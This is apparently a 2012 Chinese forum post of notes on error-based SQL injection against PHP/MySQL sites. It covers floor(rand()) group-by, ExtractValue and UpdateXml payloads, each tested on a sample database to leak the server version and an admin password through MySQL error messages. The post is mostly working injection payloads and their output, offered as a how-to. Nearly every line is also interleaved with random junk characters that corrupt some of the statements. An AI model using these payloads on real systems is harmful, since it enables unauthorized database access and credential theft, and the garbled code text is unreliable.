放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
/ f$ p( a+ E! \! \1 \4 ]实际测试环境:" z1 C4 q5 Q. C1 T( ]2 c
4 E* E4 A9 `2 T9 b) k ?0 `3 S ( M- T7 D5 E; E# f+ F: M. t. r
mysql> show tables;
* J) W+ I6 k/ p2 v1 s8 r1 T4 m) [+----------------+
, O" W- k- \! {" C$ G, t8 m% h| Tables_in_test |- c! m! C* @' l) A- v4 c
+----------------+9 Q3 V- M1 O+ q1 w( ~4 B: \1 C' i
| admin |
- H0 s# x& O3 G3 e| article |
0 v; v' p9 q$ G |9 M+----------------+7 i- D# L: I! ~% k) n. S
z! T C' p" B! F
( z6 F; f' \: ]( h$ Q: S : d, ^- Q* t, i$ v1 Y# `, A+ k
mysql> describe admin;
8 [+ A: d2 r( ?+-------+------------------+------+-----+---------+----------------+
; w" Y+ o# N. @| Field | Type | Null | Key | Default | Extra |) ?3 ^% x- Y$ A, g G
+-------+------------------+------+-----+---------+----------------+$ o1 f6 A' D! a: C0 e8 k. c6 O. v
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
. c6 c' N7 X( `( E3 B! || user | varchar(50) | NO | | NULL | |3 S: y, A$ D; d- t6 S
| pass | varchar(50) | NO | | NULL | |5 l9 c* E5 O0 g5 @& b
+-------+------------------+------+-----+---------+----------------+1 x* | x6 ]/ a P, Y: s
* d( Q6 r% c. k
) z5 c3 {5 F; q; d8 u
9 ^8 B+ W; D8 ?$ H7 S, q8 ]2 [
mysql> describe article;
! Q" l) p+ r: e/ U% a+---------+------------------+------+-----+---------+----------------+( x7 E0 a) u7 A& O
| Field | Type | Null | Key | Default | Extra | w: A! Q1 d4 ^: y7 [
+---------+------------------+------+-----+---------+----------------+9 ?' f; N" y; h7 t* R+ H& |
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |5 N8 R' {% M& k
| title | varchar(50) | NO | | NULL | |' {5 Y# ]) }/ y6 a. v: f" X9 `
| content | varchar(50) | NO | | NULL | |
8 h- s* i( m K+ i+---------+------------------+------+-----+---------+----------------+
+ N! Y' T% h- [+ {1、通过floor报错! f) d2 M% x) g, L
可以通过如下一些利用代码
+ s7 b: P, k+ ?9 g# k k: ]6 U% C u! ]; x' B8 x
0 b! i3 A* }6 V
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x: n* b4 l1 t$ e
from information_schema.tables group by x)a); r( v& N! W k& X
1 e$ ^6 M5 G; G. N: S' l$ V4 \
7 [' |9 n& ^' f1 k5 V; F0 K5 _! ]% qand (select count(*) from (select 1 union select null union select !1)x/ M0 M9 ]5 q0 V3 R8 I9 J4 A
group by concat((select table_name from information_schema.tables limit 1),
1 N( z- S) Y* p/ O( [+ Ufloor(rand(0)*2)));: Z( X4 ?/ J9 }/ A4 f+ r* n
举例如下:
C; L( Q$ W2 @7 `' }: ]; }: J首先进行正常查询:5 F& P s8 E9 A
; j- ?' k$ d- v1 ~# K/ l
mysql> select * from article where id = 1;
5 `2 m0 b8 s$ T+----+-------+---------+! ]/ g- Z& w' c4 G6 a2 B8 k! A9 N
| id | title | content |
7 G( o, L3 E. v* L6 K" z2 J! S3 E+----+-------+---------+
# }% j; b7 F* B; Z, V| 1 | test | do it |3 I6 ]# Z0 v$ j, J; ?! @( j
+----+-------+---------+8 u( \+ S0 m2 Z- q* l' [* ~7 Z
假如id输入存在注入的话,可以通过如下语句进行报错。- l1 f5 f# j7 W
9 G: ]( P2 q2 Y2 M/ X7 }
' C" d# x" U7 ]' I& Z7 ~) J! Tmysql> select * from article where id = 1 and (select 1 from
f/ \$ s8 C4 H6 G; A(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
5 [, ]/ T) a) L; w* jERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key': g d+ v, a7 G. O8 P. R
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。- }( @1 ^/ I; l2 _
例如我们需要查询管理员用户名和密码:5 p3 F. F7 H4 D: o7 c
Method1:
/ y* N+ p, J( t2 t
/ j. k/ B2 r4 ]# A + y/ e5 z0 R( Q/ _0 L" j
mysql> select * from article where id = 1 and (select 1 from1 a; Y, P+ M; W2 ^5 [9 E- E) q2 l0 v
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
9 g, A2 W0 K* _# m3 Y3 o) ~2 Cfrom information_schema.tables group by x)a);
! F8 b- i3 E) _. L2 tERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'8 N5 }7 V) s' Y) G0 i/ f
Method2:
P& Z- z# ]8 s2 M9 ^* X& `# \ + ]7 M* l0 d- D8 W6 {+ j: Y$ y
. J$ d/ @1 a5 \& h( dmysql> select * from article where id = 1 and (select count(*)) w! O) v% O$ j ^: E" X+ `8 C
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
! m- X2 P+ u4 z( s0 kfloor(rand(0)*2)));
5 Y2 b- n0 _6 o& hERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'/ P& Q! i) i) B# Q" y0 U
2、ExtractValue9 I! R, H* J. T9 r" S- F B
测试语句如下
" y7 P4 `$ Y( w+ W; h } 2 B( O2 Q2 ?0 A# @. b" q1 |, W
- x1 u7 Q" k0 z/ m `8 v' P5 W/ }- }and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));4 j' @ D8 A3 T- g
实际测试过程
- i6 r% P+ [; o" v
( D# \8 w+ r0 B' a/ Q q7 X) D- D, y
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,6 Z' H. ~7 L' j1 {* N4 k
(select pass from admin limit 1)));--
$ f9 X( s/ W, _1 R& P. XERROR 1105 (HY000): XPATH syntax error: '\admin888'+ [0 d7 @2 J% d0 D m: c! Y
3、UpdateXml
) L0 x# u4 n" Z7 {测试语句
! S7 G) s0 `1 A$ z8 @1 T( R2 \
7 `: {# c2 T, s: t7 j E; D* B
. E2 @5 O- U& X- V5 pand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
) x D$ s7 x* C% s8 z实际测试过程! N0 f3 C1 ^% Y
0 z7 t9 x" C/ U
# Q) j: I1 d; e7 C" g4 x* F% M
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,- {% N6 _, e, g( D2 S/ k5 P
(select pass from admin limit 1),0x5e24),1));
A8 ~, n5 _$ z5 qERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'& T& P) w$ d B# r0 o3 _* J1 H
All, thanks foreign guys.
9 [) \$ H' |6 {
7 }5 C5 f& w+ X& R/ z7 W; S; f+ E# V# {
|
发表于 2012-12-10 10:28:51
收藏
支持
反对